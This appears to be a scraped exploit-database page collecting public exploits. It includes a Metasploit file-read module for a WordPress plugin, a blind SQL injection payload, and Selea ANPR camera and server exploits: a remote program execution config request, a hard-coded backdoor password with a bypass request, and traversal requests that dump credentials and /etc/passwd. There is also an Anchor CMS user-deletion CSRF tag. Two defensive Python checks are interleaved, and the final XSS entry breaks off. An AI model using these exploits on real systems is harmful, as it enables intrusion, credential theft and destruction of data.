All posts published by ISHACK AI BOT
-
Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Simple JobBoard Authenticated File Read Vulnerability',
      'Description' => %q{
        This module exploits an authenticated directory traversal vulnerability in
        WordPress plugin 'Simple JobBoard' < 2.9.3, allowing arbitrary file read
        with the web server privileges.
      },
      'Author' => [
        'Arcangelo Saracino',       # Vulnerability discovery
        'Hoa Nguyen - Suncsr Team', # Metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2020-35749'],
        ['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'],
        ['URL', 'https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html']
      ],
      'DisclosureDate' => 'Jan 15 2021'))

    register_options([
      OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
      OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
      OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']),
      OptInt.new('DEPTH', [true, 'Traversal depth (to reach the root folder)', 8]),
    ])
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def check
    cookie = wordpress_login(username, password)
    # No session cookie means the login failed: nothing to report as a valid credential.
    return CheckCode::Safe if cookie.nil?

    store_valid_credential(user: username, private: password, proof: cookie)
    CheckCode::Appears
  end

  def run_host(ip)
    cookie = wordpress_login(username, password)
    traversal = '../' * datastore['DEPTH']
    filename = datastore['FILEPATH']
    # Strip a leading slash so the traversal prefix is applied to a relative path.
    filename = filename[1, filename.length] if filename =~ /^\//
    res = send_request_cgi({
      'cookie' => cookie,
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'wp-admin', ''),
      'vars_get' => {
        'post' => 'application_id',
        'action' => 'edit',
        'sjb_file' => "#{traversal}#{filename}"
      }
    })
    fail_with Failure::Unreachable, 'Connection failed' unless res
    fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' if res.code != 200
    fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?

    print_good('Downloading file ...')
    print_line("\n#{res.body}\n")
    fname = datastore['FILEPATH']
    path = store_loot(
      'Simple_JobBoard.traversal',
      'text/plain',
      ip,
      res.body,
      fname
    )
    print_good("File saved in: #{path}")
  end
end
-
Apartment Visitors Management System 1.0 - 'email' SQL Injection
# Exploit Title: Apartment Visitors Management System 1.0 - 'email' SQL Injection
# Date: 20.01.2021
# Exploit Author: CANKAT ÇAKMAK
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: V1.0
# Tested on: Windows 10

----------------------------------------------------
POST /avms/forgot-password.php HTTP/1.1
Host: test.com
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: test.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://test.com/avms/forgot-password.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

email=test%40gmail.com&contactno=1&submit=
----------------------------------------------------

PoC:

Parameter: email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 2600 FROM (SELECT(SLEEP(5)))jpeB) AND 'WVFv'='WVFv&contactno=1&submit=
-
Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution
# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution
# Date: 08.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution

Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: 4.0.1.6(210120)
                  4.013(201105)
                  3.100(200225)
                  3.005(191206)
                  3.005(191112)

Summary: Our CPS (Car Plate Server) software is an advanced solution that can be installed on computers and servers and used as an operations centre. It can create sophisticated traffic control and road safety systems connecting to stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert notifications directly to tablets or smartphones, it can receive and transfer data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution that offers full integration with main video surveillance software. Our CPS software connects to the national operations centre and provides law enforcement authorities with necessary tools to issue alerts. CPS is designed to guarantee cooperation among different law enforcement agencies. It allows to create a multi-user environment that manages different hierarchy levels and the related division of competences.

Desc: The server suffers from an arbitrary win32/64 binary executable execution when setting the NO_LIST_EXE_PATH variable to a program of choice. The command will be executed if the proper trigger criteria are met. It can be exploited via CSRF, or by navigating to the /cps/ endpoint from the camera IP and bypassing authentication, gaining the ability to modify the running configuration, including changing the password of admin and other users.

Tested on: Microsoft Windows 10 Enterprise
           SeleaCPSHttpServer/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5622
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php

08.11.2020

--

POST /config_request?ACTION=WRITE HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 6309
Authorization: Basic ZmFrZTpmYWtl
Accept: application/json, text/plain, */*
LoginMode: angular
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75
AuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a
content-type: application/json
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

{
  "ACTIONS": {
    "ANIA_LIST_DAYS_NUM": "15",
    "ANIA_LIST_PWD": "",
    "ANIA_LIST_USER": "{B64valuehereommited}",
    "BLACK_LIST_COUNTRY": "",
    "EXACT_MATCH": "false",
    "FUZZY_MATCH": "true",
    "MINISTEROTRASPORTI_LIST_DAYS_NUM": "15",
    "MINISTEROTRASPORTI_LIST_ENABLE_CHECK": "0,1",
    "MINISTEROTRASPORTI_LIST_GET_OWNERS": "false",
    "MINISTEROTRASPORTI_LIST_PWD": "",
    "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE": "false",
    "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION": "false",
    "MINISTEROTRASPORTI_LIST_USER": "",
    "MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER": "false",
    "MINISTEROTRASPORTI_LIST_USE_VPN": "true",
    "MINISTEROTRASPORTI_LIST_VPN_PASSWORD": "",
    "MINISTEROTRASPORTI_LIST_VPN_USERNAME": "",
    "MINISTERO_LIST_DAYS_NUM": "24",
    "MINISTERO_LIST_PWD": "",
    "MINISTERO_LIST_USER": "",
    "NO_LIST_ENABLED": "true",
    "NO_LIST_ENABLE_EXE": "true",
    "NO_LIST_EXE_PATH": "C:/windows/system32/calc.exe",
    "NO_LIST_HTTP": "http://localhost:8080/$TRIGGER_EXE_VAR",
    "NO_LIST_HTTP_ENABLED": "false",
    "NO_LIST_SEND_TCP_ALARM": "",
    "PERMISSIVE_MATCH": "true",
    "WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO": ""
  },
  "CAMERAINFO": {
    "BA__________": {
      "APPROACHING": "",
      "CustomCameraId": "",
      "CustomGateId": "",
      "DetectDesc": "ZSL",
      "DetectId": "",
      "Direction": "",
      "GPSLocation": "",
      "GateDesc": "3",
      "GateId": "",
      "LEAVING": "",
      "ZoneName": "",
      "setname": "false",
      "skip": "false"
    }
  },
  "CONTEXT": {
    "BA__________": {
      "URL": [
        "https://www.zeroscience.mk"
      ]
    }
  },
  "DBMS": {
    "DB_NAME": "",
    "DB_PASSWORD": "",
    "DB_SERVER": "",
    "DB_TYPE": "sqlite",
    "DB_USERNAME": "",
    "ENCRYPT_DB": "false",
    "SQLITE_MAX_MB_RAM_CACHE": "-1"
  },
  "EMAIL": {
    "DEST": "",
    "FROM_EMAIL": "",
    "FROM_NAME": "",
    "LOG_USER_SEARCH": "false",
    "MIN_EMAIL_TIME": "5",
    "PASSWORD": "",
    "PORT": "25",
    "SEND_EMAIL_ON_TAMPER": "false",
    "SERVER": "",
    "SSL": "false",
    "USERNAME": "",
    "XOAUTH2": "false"
  },
  "EMAIL-XOAUTH2": {
    "refresh_token": ""
  },
  "EZ_CLIENTS": {
    "PASSWORD": "",
    "SLAVES": "",
    "USERNAME": "",
    "USE_CNTLM": "false",
    "WANT_CTX": "false"
  },
  "EZ_CLIENT_SCNTT": {
    "CTX": "true",
    "HOST": "",
    "PASSWORD": "",
    "PORT": "443",
    "USERNAME": ""
  },
  "FTPSYNC": {
    "DELETE_OLD_SYNC_DAYS": "7",
    "JSON_CONFIG": "eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==",
    "SAVE_FTP_SEND_ERRORS": "true"
  },
  "GLOBAL_HTTP_PROXY": {
    "CNTLM_ENABLED": "false",
    "EZ_ADDRESS": "cps.selea.com",
    "EZ_PORT": "8999",
    "HOST": "",
    "NON_PROXY_HOST": "localhost|^(10|127|169\\.254|172\\.1[6-9]|172\\.2[0-9]|172\\.3[0-1]|192\\.168)\\..+",
    "PASSWORD": "",
    "PORT": "",
    "PROXY_ENABLED": "true",
    "USERNAME": ""
  },
  "HTTPS": {
    "CERTIFICATE": "",
    "ENABLE_HTTP2": "true",
    "GET_CERTIFICATE_FROM_SELEA": "false",
    "PRIVATE_KEY": "",
    "ROOT_CERTIFICATE": ""
  },
  "MASTER_CPS": {
    "ENABLED": "true",
    "MASTERS": "",
    "PASSWORD": "",
    "USERNAME": ""
  },
  "PROXY_TCP": {
    "ENABLED": "false",
    "USE_HTTP_PROXY": "false"
  },
  "REMOTE_LIST": {
    "ADDRESS": "",
    "ENABLED": "false",
    "PASSWORD": "",
    "PORT": "",
    "USERNAME": ""
  },
  "REPORT": {
    "STATS_AGGREGATE": "true",
    "STATS_ENABLED": "false",
    "STATS_FREQ": "MONTH",
    "STATS_PATH": "",
    "STATS_SELECTED": "",
    "STATS_WEEK_DAY": "Mon"
  },
  "SCNTT": {
    "LIST_A1_DAYS_LIMIT": "0",
    "SCNTT_PASSWORD": "",
    "SCNTT_PRIV_KEY_FILENAME": "",
    "SCNTT_PUB_CERT": "",
    "SCNTT_SYSTEM_DESC": "",
    "SCNTT_SYSTEM_ID": "",
    "SCNTT_USERNAME": ""
  },
  "SETTINGS": {
    "ALLOW_FLASH_NOTIFICATIONS": "true",
    "AUTO_UPDATE": "true",
    "BACKUP_AT_SPECIFIC_HOUR": "-1",
    "BACKUP_DB_PATH": "",
    "BACKUP_EVERY_HOURS": "0",
    "CARPLATE_DETAILS_ENABLED": "false",
    "CHECK_EXPIRING_CARPLATES": "false",
    "CHECK_EXPIRING_CARPLATES_DAYS": "7",
    "CHECK_FILENAME_SYNTAX": "true",
    "DB_DELETE_DAYS": "90",
    "DB_DELETE_ENABLE": "false",
    "DB_DELETE_LOG_DAYS": "7",
    "DB_DELETE_OCR_FILE": "90",
    "DB_STATS_DELETE_DAYS": "90",
    "DISABLE_WHITELIST_REMOTE_DB_CHECK": "false",
    "ENCRYPT_IMAGES": "false",
    "FREE_DISK_LIMIT": "1000",
    "FRIENDLY_NAME": "test",
    "FTP_CUSTOM_PORT_RANGE": "false",
    "FTP_DOWNLOAD_DISABLED": "true",
    "FTP_ENABLED": "true",
    "FTP_EXTERN_IP": "",
    "FTP_EXTERN_IP_AUTO": "false",
    "FTP_LIST_DIR_DISABLED": "true",
    "FTP_MAX_PORT": "0",
    "FTP_MIN_PORT": "0",
    "FTP_PORT": "21",
    "FTP_USERS": "",
    "FTP_USE_FTPS": "true",
    "HTTP2_PORT": "8081",
    "HTTP_PASSWORD": "CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU",
    "HTTP_PORT": "8080",
    "HTTP_USERNAME": "admin",
    "IGNORE_CONTEXT_FOR_UNREADFAKE": "false",
    "IGNORE_IF_NOT_SYNTAX_MATCH": "false",
    "MILESTONE_CONNECTIONS": "5",
    "MILESTONE_ENABLED": "true",
    "MILESTONE_ENABLE_ACTIVE_CONNECTION": "false",
    "MILESTONE_PORT": "5666",
    "MILESTON_REMOTE_IP": "",
    "MILESTON_REMOTE_PORT": "8080",
    "MIN_LOG_LEVEL": "0",
    "PERIODIC_BACKUP_CONFIG": "0",
    "REMOVE_BLACK_LIST_ON_EXPIRE": "true",
    "REMOVE_NON_ALARM_CARPLATE": "false",
    "REMOVE_WHITE_LIST_ON_EXPIRE": "true",
    "SAVE_GATEWAY_SEND_ERRORS": "true",
    "SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS": "7",
    "SEND_EMAIL_ON_LOST_CONNECTION": "false",
    "SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME": "600",
    "SEND_EMAIL_ON_NO_PLATE_READ": "false",
    "SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME": "12",
    "SERVER_NTP_ON": "false",
    "SERVER_NTP_PORT": "123",
    "USE_HTTPS": "false"
  },
  "VPNC": {
    "VPN_NET_NAME": ""
  },
  "TCP_TEMPLATES": []
}
-
Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation
# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation
# Date: 08.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea CarPlateServer (CPS) v4.0.1.6 Local Privilege Escalation

Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: 4.0.1.6(210120)
                  4.013(201105)
                  3.100(200225)
                  3.005(191206)
                  3.005(191112)

Summary: Our CPS (Car Plate Server) software is an advanced solution that can be installed on computers and servers and used as an operations centre. It can create sophisticated traffic control and road safety systems connecting to stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert notifications directly to tablets or smartphones, it can receive and transfer data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution that offers full integration with main video surveillance software. Our CPS software connects to the national operations centre and provides law enforcement authorities with necessary tools to issue alerts. CPS is designed to guarantee cooperation among different law enforcement agencies. It allows to create a multi-user environment that manages different hierarchy levels and the related division of competences.

Desc: The application suffers from an unquoted search path issue impacting the service 'Selea CarPlateServer' for Windows, deployed as part of the Selea CPS software application. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications, where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Tested on: Microsoft Windows 10 Enterprise
           SeleaCPSHttpServer/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5621
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5621.php

08.11.2020

--

C:\Users\Smurf>sc qc "Selea CarPlateServer"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Selea CarPlateServer
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:/Program Files/Selea/CarPlateServer/CarPlateService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Selea CarPlateServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\Smurf>
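A defender-side audit for the condition this advisory describes, added here as an example; it is not code from the advisory or from Selea. It parses the `sc qc` text quoted above (retyped below as a constructed sample so it runs offline), flags a service whose BINARY_PATH_NAME is unquoted yet contains a space, records which account the service runs as, and produces the quoted path an administrator would set. The regular expressions and the rule that the image path ends at the first `.exe` token are this example's own assumptions.

```python
import re

# Constructed sample: the `sc qc` output quoted in the advisory above, retyped
# here so the example runs offline. Not captured from a live host.
SAMPLE_SC_QC = """
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Selea CarPlateServer
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:/Program Files/Selea/CarPlateServer/CarPlateService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Selea CarPlateServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

_FIELD = re.compile(r"\s*([A-Z_]+)\s*:\s?(.*)$")
_EXE = re.compile(r"(?i)(.*?\.exe)(.*)$")


def parse_sc_qc(text):
    """Map FIELD -> value for the 'FIELD : value' lines of one sc qc block."""
    fields = {}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def split_image_path(binary_path_name):
    """Return (executable, arguments) for an unquoted BINARY_PATH_NAME.
    Assumption of this example: the image path ends at the first '.exe'
    token; if there is none, the whole string is the image."""
    m = _EXE.match(binary_path_name.strip())
    if not m:
        return binary_path_name.strip(), ""
    return m.group(1), m.group(2)


def is_unquoted_with_spaces(binary_path_name):
    """The condition the advisory describes: the image path is not wrapped in
    double quotes and contains a space, so the service control manager has to
    guess where the executable name ends."""
    path = binary_path_name.strip()
    if not path or path.startswith('"'):
        return False
    exe, _ = split_image_path(path)
    return " " in exe


def quoted_path(binary_path_name):
    """Remediated form: the executable wrapped in double quotes, with any
    arguments kept as they were."""
    path = binary_path_name.strip()
    if path.startswith('"'):
        return path
    exe, args = split_image_path(path)
    return '"%s"%s' % (exe, args)


def audit_service(sc_qc_text):
    """One finding per sc qc block: whether the path is unquoted with spaces,
    which account the service runs as (LocalSystem is what makes it matter),
    and the corrected path when a fix is needed."""
    fields = parse_sc_qc(sc_qc_text)
    binpath = fields.get("BINARY_PATH_NAME", "")
    finding = {
        "service": fields.get("SERVICE_NAME"),
        "binary_path": binpath,
        "runs_as": fields.get("SERVICE_START_NAME"),
        "unquoted_with_spaces": is_unquoted_with_spaces(binpath),
    }
    if finding["unquoted_with_spaces"]:
        finding["fix"] = quoted_path(binpath)
    return finding


if __name__ == "__main__":
    print(audit_service(SAMPLE_SC_QC))
```

Feed it the `sc qc` output of each service on a host; a finding with `unquoted_with_spaces` true and `runs_as` LocalSystem is the case above. The corrected value is applied with `sc config "<service>" binPath= "..."`, where the inner quotes have to be escaped for the command shell, and the permissions on every directory along the path should be reviewed at the same time, since quoting only removes the ambiguity, not a writable `C:\Program Files\Selea`.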
-
Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Author: Ninad Mishra
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://anchorcms.com/download
# Version: 0.12.7
# CVE : CVE-2020-23342

### PoC

The CMS uses the GET method to perform sensitive actions, hence users can be deleted via exploit.html.

================================
<img src="http://target/anchor/index.php/admin/users/delete/21">
================================

Where 21 is the user ID. When the admin opens the exploit.html link, the user with ID 21 will be deleted.
-
Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite
# Exploit Title: Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera Developer Backdoor Config Overwrite

Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model:    iZero
                            Targa 512
                            Targa 504
                            Targa Semplice
                            Targa 704 TKM
                            Targa 805
                            Targa 710 INOX
                            Targa 750
                            Targa 704 ILB
                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
                  CPS:      4.013(201105)
                            3.100(200225)
                            3.005(191206)
                            3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre.

Desc: There is a hard-coded password for a hidden and undocumented /dev.html page that lets the vendor enable configuration upload / overwrite on the affected device, using the checkManufacturer() function through an AJAX method.

======================================================================================

/dev.html:
----------

...
...
function checkManufacturer(){
  var manufacturer=$.cookie('manufacturer');
  if (manufacturer){
    $('#set_manufacturer').val('Disable manufacturer');
    $('#dev_page').show();
    $('#config_restore').show();
  }
  else{
    $('#set_manufacturer').val('Enable manufacturer');
    $('#dev_page').hide();
    $('#config_restore').hide();}
}
checkManufacturer();

function setMsg(msg){$('#dev_msg').html(msg); setTimeout(function(){$('#dev_msg').html("");},5000)};

$('#set_manufacturer').click(function(){
  var manufacturer=$.cookie('manufacturer');
  if (manufacturer){
    $.cookie('manufacturer',null);
    location.reload();
  }
  else{
    $.ajax({
      url: "/cgi-bin/utils.php?cmd=DEVPASS&pwd="+md5($('#dev_pwd').val()),
      timeout: 2000,
      cache:false,
      mimeType: 'text/plain'
    }).done(function(result){
      try{
        var info=$.parseJSON(result);
        if (info.auth=="OK"){
          setManufacturerTimeout();
          location.reload();
...
...

/cgi-bin/utils.php:
-------------------

...
...
$cmd=$_GET["cmd"];
if ($cmd=="DEVPASS"){
  $pwd=$_GET["pwd"];
  $info=new StdClass();
  $info->auth=($pwd==md5("Selea781830"))?"OK":"ERROR";
  print(json_encode($info, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES | JSON_NUMERIC_CHECK | JSON_PRETTY_PRINT));
  exit();
}
...
...

======================================================================================

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd HttpServer/0.1
           SeleaCPSHttpServer/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5615
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5615.php

07.11.2020

--

$ curl http://192.168.1.17/cgi-bin/utils.php?cmd=DEVPASS&pwd=4654fa64de66a5ff0befde3c0203817b
{
   "auth": "OK"
}

OR

Navigate to /dev.html and enter password: Selea781830, enable config upload.
-
Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)
# Exploit Title: Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera Unauthenticated Directory Traversal File Disclosure

Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model:    iZero
                            Targa 512
                            Targa 504
                            Targa Semplice
                            Targa 704 TKM
                            Targa 805
                            Targa 710 INOX
                            Targa 750
                            Targa 704 ILB
                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
                  CPS:      4.013(201105)
                            3.100(200225)
                            3.005(191206)
                            3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre.

Desc: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the Download Archive function of the Storage page, handled by the get_file.php script, is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker in disclosing clear-text credentials, resulting in authentication bypass.

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd HttpServer/0.1
           SeleaCPSHttpServer/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5616
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php

07.11.2020

--

$ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json
{
   "viewers": {},
   "root_pwd": "P@$$w0rd",
   "operators": {}
}

$ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false

POST /cgi-bin/get_file.php HTTP/1.1
Host: 192.168.1.17

name=TESTINGUS&files_list=/etc/passwd

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-disposition: attachment; filename="TESTINGUS.tar"
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 2048
Connection: close
Date: Wed, 09 Dec 2020 01:39:57 GMT
Server: selea_httpd

root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false
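The check that both traversal entries on this page lack, the Simple Job Board `sjb_file` handler and the camera's `get_file.php`, is that a user-supplied file name is decoded, normalised and confined to one base directory before it is opened. The following is an added example of that check and is not code from either advisory, plugin or firmware; the base directory `/srv/anpr-archive` and the two-round decode limit are this example's own assumptions. It handles the forms the requests above use: separators sent as `%2f`, an absolute path such as `/etc/passwd`, and plain `../` sequences.

```python
import os
import posixpath
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a user-supplied name would leave the base directory."""


def resolve_under(base_dir, user_path, max_decode_rounds=2):
    """Return the real path of user_path inside base_dir, or raise TraversalError."""
    # Undo percent-encoding a bounded number of times: the requests above send
    # every separator as %2f, and double-encoded input (%252e%252e) is the
    # usual way past a single decode. The bound keeps this from looping on
    # pathological input.
    decoded = user_path
    for _ in range(max_decode_rounds):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again

    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")

    # Treat backslashes as separators too, then refuse absolute paths outright:
    # an archive download only ever needs a name relative to its own directory.
    rel = decoded.replace("\\", "/")
    if rel.startswith("/"):
        raise TraversalError("absolute path not allowed: %r" % user_path)

    # Collapse '.' and '..' lexically; anything still pointing upward escapes.
    norm = posixpath.normpath(rel)
    if norm == ".." or norm.startswith("../"):
        raise TraversalError("path escapes base directory: %r" % user_path)

    # Final containment check on the resolved filesystem path, which also
    # covers a symlink inside the archive that points elsewhere.
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, norm))
    if full != base and not full.startswith(base + os.sep):
        raise TraversalError("resolved path escapes base directory: %r" % user_path)
    return full


def is_allowed(base_dir, user_path):
    """Boolean form of resolve_under, convenient for audits and tests."""
    try:
        resolve_under(base_dir, user_path)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    # Constructed inputs modelled on the requests quoted in the advisory above.
    for name in ("export.tar",
                 "%2f..%2f..%2f..%2fmnt/data/auth/users.json",
                 "/etc/passwd",
                 "../../etc/passwd",
                 "%252e%252e%2fpasswd"):
        print("%-45s %s" % (name, "allowed" if is_allowed("/srv/anpr-archive", name) else "rejected"))
```

The lexical checks come first because they are cheap and give a precise rejection reason; the `realpath` comparison is still required, since normalisation cannot see symlinks. Rejecting absolute paths rather than silently re-rooting them also makes a probe like `files_list=/etc/passwd` show up as an error in the server log instead of a 200 with an empty archive.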
-
Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS
# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera Remote Stored XSS

Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model:    iZero
                            Targa 512
                            Targa 504
                            Targa Semplice
                            Targa 704 TKM
                            Targa 805
                            Targa 710 INOX
                            Targa 750
                            Targa 704 ILB
